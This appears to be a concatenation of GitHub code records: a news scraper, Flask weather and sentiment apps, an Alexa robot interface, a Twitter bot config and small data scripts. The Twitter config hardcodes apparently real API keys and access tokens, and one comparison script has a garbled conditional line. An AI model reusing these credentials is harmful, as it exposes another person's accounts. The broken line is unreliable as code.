Descent.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19958493934","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport re\nimport requests\nfrom scrapy.http import Request\nfrom urllib import parse\nfrom ArticleSpider.items import kjjysItem, kjjysItemLoader\nfrom selenium import webdriver\nfrom scrapy.xlib.pydispatch import dispatcher\nfrom scrapy import signals\nfrom ArticleSpider.utils.common import get_md5\nimport datetime\nimport platform\nfrom pyvirtualdisplay import Display\n\n\ndef get_my_content(url, value):\n new_content = []\n articleorign = '
<p><a href="{}" target="_blank">原文链接</a></p></div>
'.format(url)\n for cvalue in value:\n cvalue = cvalue[:-6]\n cvalue = cvalue + articleorign\n new_content.append(cvalue)\n return new_content\n\n\ndef remove_comment_tags(value):\n # 去掉tags中提取的评论\n if len(value) > 1:\n return value[1]\n else:\n return value[0]\n\n\n# 科学网 头条和要闻 数据爬取\nclass ScienceSpider(scrapy.Spider):\n name = 'science'\n allowed_domains = ['news.sciencenet.cn']\n start_urls = ['http://news.sciencenet.cn/']\n\n headers = {\n \"HOST\": \"www.news.sciencenet.cn\",\n \"Referer\": \"http://news.sciencenet.cn/\",\n 'User-Agent': \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36\"\n }\n\n def __init__(self, **kwargs):\n sysstr = platform.system()\n if sysstr == 'Windows':\n self.browser = webdriver.Chrome(executable_path=\"E:/pythonDriver/chromedriver.exe\")\n else:\n self.display = Display(visible=0, size=(800, 600))\n self.display.start()\n self.browser = webdriver.Chrome(executable_path=\"/usr/bin/chromedriver\")\n super(ScienceSpider, self).__init__()\n dispatcher.connect(self.spider_closed, signals.spider_closed)\n\n def spider_closed(self,spider):\n #当爬虫退出时关闭chrom\n print(\"spider closed\")\n sysstr = platform.system()\n if sysstr == 'Windows':\n self.browser.quit()\n else:\n self.browser.quit()\n self.display.stop()\n\n def parse(self, response):\n \"\"\"\n 1. 获取文章列表页中的文章url并交给scrapy下载后并进行解析\n 2. 获取下一页的url并交给scrapy进行下载, 下载完成后交给parse\n \"\"\"\n # 解析列表页中的所有文章url并交给scrapy下载后并进行解析\n if response.status == 404:\n self.fail_urls.append(response.url)\n self.crawler.stats.inc_value(\"failed_url\")\n if response.url in ['http://news.sciencenet.cn/topnews.aspx','http://news.sciencenet.cn/indexyaowen.aspx']:\n post_nodes = response.xpath(\"//*[@id='mleft3']/table/tbody/tr/td/table/tbody/tr[last()]\")\n type_name = response.css(\"#mleft2 ::text\").extract_first(\"\")\n type_name = type_name.strip()\n for post_node in post_nodes:\n post_url = post_node.css(\"a::attr(href)\").extract_first(\"\")\n title = post_node.css(\" a::text\").extract_first(\"\")\n publish_date = post_node.xpath(\"td[3]/text()\").extract_first(\"\")\n publish_date = publish_date.strip()\n publish_date = publish_date.replace('/', '-')\n compare_date = datetime.datetime.now()\n compare_date = datetime.datetime.strptime(compare_date.strftime(\"%Y-%m-%d %H:%M:%S\"), \"%Y-%m-%d %H:%M:%S\").date()\n publishDate = datetime.datetime.strptime(publish_date, \"%Y-%m-%d %H:%M:%S\").date()\n if publishDate >= compare_date:\n print(\"=======get it==========\")\n yield Request(url=parse.urljoin(response.url, post_url), headers=self.headers, meta={\"publish_date\": publish_date, \"type_name\": type_name, \"title\": title}, callback=self.parse_detail)\n else:\n post_nodes = response.css(\".ltitbg a\")\n for post_node in post_nodes[0:3]:\n post_url = post_node.css(\"::attr(href)\").extract_first(\"\")\n print(\"out===url\")\n print(post_url)\n yield Request(url=parse.urljoin(response.url, post_url), headers=self.headers, callback=self.parse)\n\n def parse_detail(self, response):\n\n type_name = response.meta.get(\"type_name\", \"\")\n publish_date = response.meta.get(\"publish_date\", \"\") # 发布时间\n item_loader = kjjysItemLoader(item=kjjysItem(), response=response)\n image_url = response.css(\"#content1 img::attr(src)\").extract()\n title = response.meta.get(\"title\", \"\")\n title = title.strip()\n\n content = response.css(\"#content1\").extract()\n content = get_my_content(response.url, content)\n content = \"\".join(content)\n\n new_image_url = []\n if 
len(image_url) > 0:\n for in_url in image_url:\n in_url = parse.urljoin(response.url, in_url)\n new_image_url.append(in_url)\n else:\n item_loader.add_value(\"front_image_path\", '--')\n\n item_loader.add_value(\"url\", response.url)\n item_loader.add_value(\"url_object_id\", get_md5(response.url))\n if len(new_image_url) > 0:\n item_loader.add_value(\"front_image_url\", new_image_url)\n # else:\n # item_loader.add_value(\"front_image_url\", [\"\"])\n item_loader.add_value(\"source_net\", self.start_urls[0])\n item_loader.add_value(\"source_name\", '科学网')\n item_loader.add_value(\"type_name\", type_name)\n item_loader.add_value(\"title\", title)\n item_loader.add_value(\"content\", content)\n\n item_loader.add_value(\"publish_time\", publish_date)\n item_loader.add_value(\"crawl_time\", datetime.datetime.now())\n article_item = item_loader.load_item()\n\n yield article_item\n","repo_name":"dasinWalk/ArticleSpider","sub_path":"ArticleSpider/spiders/science.py","file_name":"science.py","file_ext":"py","file_size_in_byte":5921,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73142340328","text":"#! /usr/bin/env python\nimport sys\nimport time\n\nfrom sklearn.metrics import accuracy_score\n\nfrom tools.email_preprocess import preprocess\n\n# your imports go here\nfrom sklearn.svm import SVC\n\n\ndef find_best(features_train, features_test, labels_train, labels_test,\n n=None, **params):\n param_sets = []\n for C in (1.0, 10.0, 100.0, 1000.0, 10000.0):\n param_sets.append({\n 'kernel': params.get('kernel', 'linear'),\n 'gamma': params.get('gamma', 'scale'),\n 'C': C,\n })\n\n accuracy_map = []\n for params in param_sets:\n print('=' * 70)\n score = do_test(\n features_train, features_test, labels_train, labels_test,\n n=n, **params)\n accuracy_map.append((score, params))\n\n for score, params in sorted(accuracy_map, key=lambda i: i[0]):\n print(f'{params} => {score}')\n\n\ndef do_test(features_train, features_test, labels_train, labels_test,\n n=None, **params):\n if n is not None:\n n = int(n)\n print(f'{params}')\n clf = SVC(**params)\n\n start = time.time()\n clf.fit(features_train[:n], labels_train[:n])\n delta_fit = time.time() - start\n print(f'Training complete in {delta_fit:.2f}s')\n\n start = time.time()\n labels_predict = clf.predict(features_test)\n delta_predict = time.time() - start\n print(f'Prediction complete in {delta_predict:.2f}s')\n print(f'10 => {labels_predict[10]}')\n print(f'26 => {labels_predict[26]}')\n print(f'50 => {labels_predict[50]}')\n print(f'Chris => {sum(labels_predict)}')\n\n score = accuracy_score(labels_predict, labels_test)\n print(f'Accuracy {100 * score:.2f}%')\n\n return labels_predict, score\n\n\ndef main():\n features_train, features_test, labels_train, labels_test = preprocess()\n do_test(features_train, features_test, labels_train, labels_test,\n kernel='rbf', gamma='auto', C=10000.0)\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"clayg/udacity","sub_path":"ud120/3.28/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25978428904","text":"from itertools import count\nfrom typing import Iterable, Any, Tuple, Union, Optional, Generator\n\nfrom qdrant_client.http import SyncApis\nfrom qdrant_client.http.models import Batch, PointsList, PointStruct\nfrom qdrant_client.uploader.uploader import BaseUploader\n\n\ndef 
upload_batch(openapi_client: SyncApis, collection_name: str, batch: Union[Tuple, Batch]) -> bool:\n ids_batch, vectors_batch, payload_batch = batch\n\n # Make sure we do not send too many ids in case there is an iterable over vectors,\n # and we do not know how many ids are required in advance\n if len(ids_batch) > len(vectors_batch):\n ids_batch = ids_batch[:len(vectors_batch)]\n\n if payload_batch is not None:\n payload_batch = list(payload_batch)\n else:\n payload_batch = (None for _ in count())\n\n points = [\n PointStruct(\n id=idx,\n vector=vector,\n payload=payload,\n ) for idx, vector, payload in zip(ids_batch, vectors_batch, payload_batch)\n ]\n\n openapi_client.points_api.upsert_points(\n collection_name=collection_name,\n point_insert_operations=PointsList(\n points=points\n )\n )\n return True\n\n\nclass RestBatchUploader(BaseUploader):\n\n def __init__(self, uri: str, collection_name: str, **kwargs: Any):\n self.collection_name = collection_name\n self.openapi_client: SyncApis = SyncApis(host=uri, **kwargs)\n\n @classmethod\n def start(cls, collection_name: Optional[str] = None, uri: str = \"http://localhost:6333\", **kwargs: Any) -> 'RestBatchUploader':\n if not collection_name:\n raise RuntimeError(\"Collection name could not be empty\")\n return cls(uri=uri, collection_name=collection_name, **kwargs)\n\n def process(self, items: Iterable[Any]) -> Generator[bool, None, None]:\n for batch in items:\n yield upload_batch(self.openapi_client, self.collection_name, batch)\n","repo_name":"prakha/webUIBackend","sub_path":"myvenv/lib/python3.7/site-packages/qdrant_client/uploader/rest_uploader.py","file_name":"rest_uploader.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16014601653","text":"class BuildInfo(object):\n u\"\"\"Container with builder flags and data, as stored in elements, to guide conditional \n e.build( ) and e.buildCss( ) and e.buildFlat( ) calls.\n Note that these attribute and flags can be defined specifically per element, so they\n cannot be part of a view.\n \"\"\"\n def __init__(self, **kwargs):\n self.title = None # Can be used to overwrite the standard name/title of an element.\n self.description = None\n self.keyWords = None\n # Urls for \n self.webFontsUrl = 'fonts/webfonts.css'\n self.favIconUrl = None\n self.jsUrls = None\n self.appleTouchIconUrl = None\n self.jQueryUrl = 'http://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js'\n self.jQueryUrlSecure = 'https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js'\n self.mediaQueriesUrl = 'http://code.google.com/p/css3-mediaqueries-js'\n # Device\n self.viewPort = \"width=device-width, initial-scale=1.0\"\n # Fonts\n self.webFonts = [\n 'http://fonts.googleapis.com/css?family=Bree+Serif',\n 'http://fonts.googleapis.com/css?family=Droid+Sans:400,700',\n ]\n # Define file paths where to read content, instead of constructing by the builder.\n self.cssPath = None\n self.htmlPath = None\n self.headPath = None\n self.bodyPath = None\n\n for name, value in kwargs.items():\n assert hasattr(self, name) # Check only to set attributes that are supported by default value.\n setattr(self, name, value)\n\n","repo_name":"enathu/PageBot","sub_path":"Lib/pagebot/contexts/builders/buildinfo.py","file_name":"buildinfo.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"2505171482","text":"#!/usr/bin/python\n\ndef 
fullycontains(range1, range2):\n min1, max1 = map(int, range1.split('-'))\n min2, max2 = map(int, range2.split('-'))\n if min1 >= min2 and max1 <= max2:\n return True\n elif min2 >= min1 and max2 <= max1:\n return True\n else:\n return False\n\n\ndef overlaps(range1, range2):\n min1, max1 = map(int, range1.split('-'))\n min2, max2 = map(int, range2.split('-'))\n firstset = set(range(min1, max1 + 1))\n secondset = set(range(min2, max2 + 1))\n return not firstset.isdisjoint(secondset)\n\n\ndef main():\n with open('input.txt') as inputfile:\n countcontains = 0\n countoverlaps = 0\n for line in inputfile:\n elf1, elf2 = line[:-1].split(',')\n if fullycontains(elf1, elf2):\n countcontains += 1\n if overlaps(elf1, elf2):\n countoverlaps += 1\n print(f'Part 1: {countcontains}')\n print(f'Part 2: {countoverlaps}')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"eckuru/aoc2022","sub_path":"4/day4.py","file_name":"day4.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"15986582551","text":"from textblob import TextBlob\nfrom flask_cors import CORS\n# TextBlob(sentence).sentiment\n\nfrom flask import Flask, jsonify, request\napp = Flask(__name__)\nCORS(app)\n\n@app.route('/sentiment', methods=['POST'])\ndef predict_sentiment():\n data = request.get_json()\n sentence = data['sentence']\n sentiment = TextBlob(sentence).sentiment\n score = sum(sentiment)/len(sentiment)\n if score > 0.5:\n res = \"Positive\"\n else:\n res = \"Negative\"\n return jsonify({\"sentiment\": res})\n\n@app.route('/', methods=['GET'])\ndef hello():\n return jsonify({\"response\":\"This is Sentiment Application\"})\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", threaded=True, port=5000)","repo_name":"ashutosh1919/deeplearning-flask-react-app","sub_path":"sentiment-analysis-flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"33713747068","text":"def Delete_node(node):\r\n if dic[node]:\r\n nd = dic[node]\r\n for i in nd:\r\n Delete_node(i)\r\n # 자식들을 지운 후에 본인 삭제\r\n del dic[node]\r\n else:\r\n # 자식 node가 없으면 그냥 삭제\r\n del dic[node]\r\n\r\n\r\nn = int(input())\r\ndic = {}\r\nlst = list(map(int, input().split()))\r\n\r\nfor i in range(n):\r\n # tree 번호는 i\r\n dic[i] = []\r\n\r\nfor i in range(n):\r\n # root는 -1이므로 패스\r\n if lst[i] == -1:\r\n pass\r\n else:\r\n # 해당 부모에 자식 번호 넣어두기\r\n dic[lst[i]].append(i)\r\n\r\n# print(dic)\r\n# 지울 노드번호\r\nremove_node = int(input())\r\n# 지우기\r\nDelete_node(remove_node)\r\n\r\nfor k in dic.keys():\r\n # 만약 일직선일경우..\r\n if remove_node in dic[k]:\r\n dic[k].remove(remove_node)\r\n\r\n# leaf node 개수\r\nresult = 0\r\nif dic:\r\n for k, v in dic.items():\r\n if len(v)==0:\r\n result+=1\r\n# print(dic)\r\nprint(result)","repo_name":"aeriheo/study","sub_path":"2월 2주차/BOJ_1068.py","file_name":"BOJ_1068.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18059232932","text":"#!/usr/bin/env python3\nfrom flask import Flask\nfrom ask_sdk_core.skill_builder import SkillBuilder\nfrom flask_ask_sdk.skill_adapter import SkillAdapter\nfrom ask_sdk_core.utils import is_request_type, is_intent_name\nfrom ask_sdk_core.handler_input import HandlerInput\nfrom ask_sdk_model import Response\nfrom ask_sdk_model.ui import SimpleCard\nfrom 
ask_sdk_core.dispatch_components import AbstractRequestHandler, AbstractExceptionHandler\nfrom arduinobot_msgs.action import ArduinobotTask\nimport rclpy\nfrom rclpy.node import Node\nimport threading\nfrom rclpy.action import ActionClient\n\nthreading.Thread(target=lambda: rclpy.init()).start()\naction_client = ActionClient(Node('alexa_interface'), ArduinobotTask, \"task_server\")\n\napp = Flask(__name__)\n\n\nclass LaunchRequestHandler(AbstractRequestHandler):\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_request_type(\"LaunchRequest\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n speech_text = \"Hi, how can we help?\"\n\n handler_input.response_builder.speak(speech_text).set_card(\n SimpleCard(\"Online\", speech_text)).set_should_end_session(\n False)\n\n goal = ArduinobotTask.Goal()\n goal.task_number = 0\n action_client.send_goal_async(goal)\n\n return handler_input.response_builder.response\n\n\nclass PickIntentHandler(AbstractRequestHandler):\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_intent_name(\"PickIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n speech_text = \"Ok, I'm moving\"\n\n handler_input.response_builder.speak(speech_text).set_card(\n SimpleCard(\"Pick\", speech_text)).set_should_end_session(\n True)\n\n goal = ArduinobotTask.Goal()\n goal.task_number = 1\n action_client.send_goal_async(goal)\n\n return handler_input.response_builder.response\n\n\nclass SleepIntentHandler(AbstractRequestHandler):\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_intent_name(\"SleepIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n speech_text = \"Ok, see you later\"\n\n handler_input.response_builder.speak(speech_text).set_card(\n SimpleCard(\"Sleep\", speech_text)).set_should_end_session(\n True)\n\n goal = ArduinobotTask.Goal()\n goal.task_number = 2\n action_client.send_goal_async(goal)\n\n return handler_input.response_builder.response\n\n\nclass WakeIntentHandler(AbstractRequestHandler):\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_intent_name(\"WakeIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n speech_text = \"Hi, I am ready\"\n\n handler_input.response_builder.speak(speech_text).set_card(\n SimpleCard(\"Wake\", speech_text)).set_should_end_session(\n True)\n \n goal = ArduinobotTask.Goal()\n goal.task_number = 0\n action_client.send_goal_async(goal)\n\n return handler_input.response_builder.response\n\n\nclass AllExceptionHandler(AbstractExceptionHandler):\n\n def can_handle(self, handler_input, exception):\n # type: (HandlerInput, Exception) -> bool\n return True\n\n def handle(self, handler_input, exception):\n # type: (HandlerInput, Exception) -> Response\n\n speech = \"Hmm, I don't know that. 
Can you please say it again?\"\n handler_input.response_builder.speak(speech).ask(speech)\n return handler_input.response_builder.response\n\n\nskill_builder = SkillBuilder()\nskill_builder.add_request_handler(LaunchRequestHandler())\nskill_builder.add_request_handler(PickIntentHandler())\nskill_builder.add_request_handler(SleepIntentHandler())\nskill_builder.add_request_handler(WakeIntentHandler())\nskill_builder.add_exception_handler(AllExceptionHandler())\n\n\nskill_adapter = SkillAdapter(\n skill=skill_builder.create(), \n skill_id=\"SKILL-ID\",\n app=app)\n\n\nskill_adapter.register(app=app, route=\"/\")\n\n\nif __name__ == '__main__':\n app.run()","repo_name":"AntoBrandi/Arduino-Bot","sub_path":"arduinobot_ws/src/arduinobot_remote/arduinobot_remote/alexa_interface.py","file_name":"alexa_interface.py","file_ext":"py","file_size_in_byte":4293,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"53"} +{"seq_id":"7955213703","text":"from setuptools import setup, find_packages\n\ndef read_requires():\n with open(\"requirements.txt\", \"rt\") as req_f:\n requirements = []\n for req in req_f.readlines():\n requirements.append(req)\n return requirements\n\nsetup(\n name='Doors-Task',\n version='1.0.0',\n packages=find_packages(),\n url='',\n license='',\n author='odayan',\n author_email='',\n description='',\n python_requires='>=3.8.6',\n install_requires=read_requires()\n)\n","repo_name":"omerday/Doors-Task","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20905946947","text":"import pymongo\nimport os\n\n# mongodb config variables\nMONGO_HOST = None\nMONGO_PORT = None\ndatabase_name = \"twitterflash\"\ncollection_name = \"schedule\"\ncollection_dates = \"latest_dates\"\ncollection_fixtures = \"fixtures\"\n\n# defining connection to database\ndb_connection = pymongo.MongoClient(MONGO_HOST, MONGO_PORT, connect=False)\n\n# api for getting present day match schedule\nmatch_schedule_url = 'http://scoreslb-822670678.ap-northeast-2.elb.amazonaws.com/v1/get_all_matches_list'\n\n# urls for APIs for all Sports, use format to replace params in {}\n# cricket_url = \"http://52.74.75.79:8080/v1/get_match_commentary?match_id={match_id}&season_key={series_id}\"\ncricket_url = \"http://scoreslb-822670678.ap-northeast-2.elb.amazonaws.com/v1/get_match_commentary?match_id={match_id}&season_key={series_id}\"\nfootball_url = \"http://scoreslb-822670678.ap-northeast-2.elb.amazonaws.com/get_football_commentary?match_id={match_id}\"\nbasketball_url = ''\nf1_url = ''\ntennis_url = ''\n\n# twitter app credentials\ntwitter_cons_key = '0448wNvDBQpBuUSUtYMspkxld'\ntwitter_cons_secret = 'QA0sKvyi3Qfg5J07GkYoWE7BbYW23LW8aRXbtKJZi2rggDnLxB'\ntwitter_access_token = '707458521462382594-nHgEfXOiSlgZmj6iuzTTIVAT6Pon7FJ'\ntwitter_access_token_secret = 'YuCQSoS6btI0YdCk9aTtK28YHox7WbNOFyxBQf9ta0Nnj'\n\n# twitter test app credentials\n# twitter_cons_key = 'DCgP6jqWaqnpXXDNHsusTz68t'\n# twitter_cons_secret = 'WsN6DOc9rNsO3Fu4rc1DH511mxq5KOzh8kzJ4cEtZvHrUGTCwm'\n# twitter_access_token = '208713780-3czsVI3ZJV0BkxtJfk2eOjK6AUMDeVnfbZSmlOyG'\n# twitter_access_token_secret = 'cikeVIINYC8z1CZAohQiykXsin4VtTkhuyduEiC63yuMj'\n\n\n# log files\nlogs_dir = os.getcwd()+'/logs'\nstd_err_log_file = logs_dir+'/'+'twitterflash_std_logs.log'\n\n\n# time interval to run tasks (in seconds)\ntime_interval = 10\n\n# exit count variable; i.e. 
till when\n# the program waits for new update\n# here it is set to 40 minutes; \nterminate_task_at = (40*60)/time_interval\n\n\n","repo_name":"SportsUnity/twitter_bot","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14536847463","text":"from flask import Flask, render_template, request, redirect\nimport json, requests, sys, smtplib, pdb\nfrom flask_wtf import Form\nfrom flask_mail import Mail, Message\nfrom wtforms import StringField, TextAreaField, SubmitField, validators\napp = Flask(__name__)\nimport jinja2\nenv = jinja2.Environment()\nenv.globals.update(zip=zip)\napp.config['MAIL_SERVER'] = 'smtp.aynst.in'\napp.config['MAIL_PORT'] = 587\napp.config['MAIL_USE_SSL'] = False\napp.config['MAIL_USE_TLS'] = True\napp.config['MAIL_USERNAME'] = '--EMAIL--'\napp.config['MAIL_PASSWORD'] = '**PASSWORD**'\n\nclass ContactForm(Form):\n\temail = StringField('Your e-mail address:')\n\tsubmit = SubmitField('SUBSCRIBE')\n\nmail = Mail(app)\n\n@app.route('/')\ndef home():\n\treturn render_template('index.html')\n\n\n@app.route('/place' ,methods = ['POST', 'GET'])\ndef locate():\n\tcity = request.form['place']\n\ttypeof = request.form.get('menu')\n\tlocation = city\n\turl = 'http://api.openweathermap.org/data/2.5/weather?q=%s&APPID=--APIKEY--&units=metric' % (location)\n\tweatherResponse = requests.get(url)\n\tweatherResponse.raise_for_status()\n\tcity = city.title()\n\t#Load JSON Data into a python variable\n\tweatherData = json.loads(weatherResponse.text)\n\n\t#Weather descrptions\n\tw = weatherData\n\tcountry = w['sys']['country']\n\tcurr = w['weather'][0]['description']\n\tcurr = curr.title()\n\ticon = w['weather'][0]['icon']\n\ttempNow = w['main']['temp']\n\ttempNow = str(tempNow)[:2]\n\twindSpeed = w['wind']['speed']\n\thumidity = w['main']['humidity']\n\ttemp_min = w['main']['temp_min']\n\ttemp_max = w['main']['temp_max']\n\t#iconLink = 'giphy.gif'\n\tif icon == '01d':\n\t\ticonLink = 'sunny.png'\n\telif icon == '02d':\n\t\ticonLink = 'sunshine.png'\n\telif icon == '03d':\n\t\ticonLink = 'cloudy.png'\n\telif icon == '04d':\n\t\ticonLink = 'cloud1.png'\n\telif icon == '10d':\n\t\ticonLink = 'rainy.png'\n\telif icon == '10n':\n\t\ticonLink = 'rainy.png'\n\telif icon == '01n':\n\t\ticonLink = 'foggy.png'\n\telif icon == '03n':\n\t\ticonLink = 'night cloud.png'\n\telif icon == '02n':\n\t\ticonLink = 'clouds.png'\n\telif icon == '04n':\n\t\ticonLink = 'few clouds.png'\n\telif icon == '50n':\n\t\ticonLink = 'haze.png'\n\telse:\n\t\ticonLink = 'giphy.gif'\n\n\t#Get places\n\n\turl = 'https://maps.googleapis.com/maps/api/geocode/json?address='+location+'&key=--APIKEY--'\n\tgpsResponse = requests.get(url)\n\tgpsResponse.raise_for_status()\n\tgps = json.loads(gpsResponse.text)\n\tfullName = gps['results'][0]['formatted_address']\n\tlat = gps['results'][0]['geometry']['location']['lat']\n\tlng = gps['results'][0]['geometry']['location']['lng']\n\tfullName = fullName.title()\n\n\t#Get location data from Google Places API\n\n\turl='https://maps.googleapis.com/maps/api/place/nearbysearch/json?location='+str(lat)+','+str(lng)+'&type='+ str(typeof) +'&rankby=distance&key=--APIKEY--'\n\tplacesResponse = requests.get(url)\n\tplacesResponse.raise_for_status()\n\tplaces = json.loads(placesResponse.text)\n\tp = places\n\tnameList = []\t\t #stores names\n\tratingList = []\t\t#stores ratings\n\tphotosList = []\t\t#stores photo reference\n\tplaceURLList = []\t #stores 
photos\n\taddressList = []\n\n\t#Get place name\n\tfor i in range(0,19):\n\t\tif 'photos' in p['results'][i]:\n\t\t\tpref = p['results'][i]['photos'][0]['photo_reference']\n\t\t\tphotosList.insert(i, p['results'][i]['photos'])\n\t\t\tplaceURLList.insert(i,'https://maps.googleapis.com/maps/api/place/photo?maxwidth=400&photoreference='+pref+'&key=--APIKEY--')\n\t\telse:\n\t\t\tplaceURLList.insert(i,'http://placehold.it/158x158')\n\t\tif 'name' in p['results'][i]:\n\t\t\tnameList.insert(i,p['results'][i]['name'])\n\t\t\tif 'rating' in places['results'][i]:\n\t\t\t\tratingList.insert(i,p['results'][i]['rating'])\n\t\t\telse:\n\t\t\t\tratingList.insert(i,'NA')\n\t\t\tif 'vicinity' in p['results'][i]:\n\t\t\t\taddressList.insert(i, p['results'][i]['vicinity'])\n\n\n\t#iconLink = 'http://openweathermap.org/img/w/'+icon+'.png'\n\treturn render_template('index.html', lat=lat, lng=lng, fullName=fullName, city=city, curr=curr, icon=icon, tempNow=tempNow, windSpeed=windSpeed, iconLink=iconLink, humidity=humidity, tempList = zip(nameList, ratingList, placeURLList, addressList), typeof = typeof, temp_min = temp_min, temp_max = temp_max)\n\n@app.route('/about')\ndef about():\n\treturn render_template('about.html')\n\n@app.route('/contact')\ndef contact():\n\treturn render_template('contact.html')\n\n@app.route('/confirmation')\ndef sub():\n\treturn render_template('success.html')\n\n@app.route('/privacy')\ndef privacy():\n\treturn render_template('privacy.html')\n\n@app.route('/conditions')\ndef conditions():\n\treturn render_template('conditions.html')\n\n@app.route('/play')\ndef playground():\n\treturn render_template('play.html')\n\n@app.route('/sitemap')\ndef sitemap():\n\treturn render_template('sitemap.xml')\n\n@app.route('/construct', methods = ['POST', 'GET'])\ndef construction():\n\tform = ContactForm()\n\tif request.method == 'POST':\n\t\t\tmsg = Message(\"Message from your visitor\",\n\t\t\t\t\t\t sender='--EMAIL--',\n\t\t\t\t\t\t recipients=['--RECIPIENTS EMAIL--'])\n\t\t\tmsg.body = \"\"\"\n\t\t\tFrom: <%s>\n\t\t\t\"\"\" % (form.email.data)\n\t\t\tmail.send(msg)\n\t\t\treturn redirect('confirmation')\n\n\telif request.method == 'GET':\n\t\treturn render_template('construct.html', form=form)\n\n@app.errorhandler(500)\ndef internal_server_error(e):\n return render_template('500.html'), 500\n\n@app.errorhandler(404)\ndef notFound(e):\n\treturn render_template('404.html'), 404\n\n@app.errorhandler(400)\ndef forbidden(e):\n\treturn render_template('400.html'), 403\n\nif __name__ == '__main__':\n\tapp.run(threaded=True)\n","repo_name":"Aayush-N/aynst","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29260850298","text":"#analyze how close the different APIs are, the output file can be found in the root directory\n# of this project \"weather_api_comp_output.txt\"\nimport pandas as pd\nimport scipy.stats as stats\nimport os\nimport abstract_weather_api\nimport numpy as np\nimport itertools\nweather_kinds = vars(abstract_weather_api.WeatherInformation()).keys()\nweather_kinds_ignore = {\"time\", \"last_updated\", \"location\", \"sun_rise\", \"description\", \"sun_set\"}\nweather_kinds = [w for w in weather_kinds if w not in weather_kinds_ignore]\nweather_api={t.__name__ for t in abstract_weather_api.apis_dict_reversed}\nweather_api=weather_api-{\"AccuWeather\",\"Meteomatics\"}\n\nprecision={\n \"temperature\":5,\n \"rain\":1,\n \"humidity\":5,\n 
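# editor's note: these values appear to be bucket widths for round_down() below\n    # (that call is commented out), e.g. round_down(23, 5) -> 20, i.e. 5-degree bins\n    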
\"wind_speed\":10,\n \"air_pressure\":1,\n \"thunder\":1\n}\nINVALID=-1000\ndef round_down(m, n):\n if n ==0:\n return m\n return m // n * n\npairs=[a for a in itertools.product(weather_api,weather_api) if a[0]!=a[1]]\nOUTLINERS_SIGNIFICANCE=0.05\nDIFF_SIGNIFICANCE=0.1\nweather_comp_stats=dict()\napi_similar=dict()\nfor w in os.listdir(\"time_series\"):\n df=pd.read_csv(\"time_series/\"+w,delimiter=\";\")\n \n for p1,p2 in pairs:\n if p1 not in df or p2 not in df:\n continue\n filtered=[x for x in zip(df[p1],df[p2]) if x[0]!=INVALID and x[1]!=INVALID]\n filtered1=[x[0] for x in filtered]\n filtered2=[x[1] for x in filtered]\n \n # df[p1]=df.apply(lambda row: round_down(row[p1],precision[w]),axis=1)\n #df[p2]=df.apply(lambda row: round_down(row[p2],precision[w]),axis=1)\n #print(np.max(np.abs(df[p1]-df[p2])))\n try:\n mx=np.nanmax(filtered)\n mn=np.nanmin(filtered)\n span=mx-mn\n if np.isnan(span):\n continue\n #print(\"Length\",len(filtered))\n #print(\"span\",p1,p2,w,mx,mn,span)\n rel_diff=[abs(x[0]-x[1])/span for x in filtered]\n # only outliers, that is values that differ more than 10%, must be analyzed further\n outliers_share=len([r for r in rel_diff if r >=DIFF_SIGNIFICANCE])/len(rel_diff)\n if w.startswith(\"humidity\"):\n print(\"Humidity\",p1,p2,mx,mn,span,outliers_share,np.nanmax(rel_diff))\n if outliers_share 0:\n if w not in weather_comp_stats:\n weather_comp_stats[w]=[]\n api_similar[w]=set()\n weather_comp_stats[w]+=[(p1,p2,mx,mn,span,outliers_share)]\n api_similar[w]=api_similar[w] | {p1, p2}\n except Exception as ex:\n raise ex\nprint(\"#\"*100)\nfor k in weather_comp_stats:\n print(k)\n for x in weather_comp_stats[k]:\n print(x)\n print(api_similar[k])\n print()\n\n 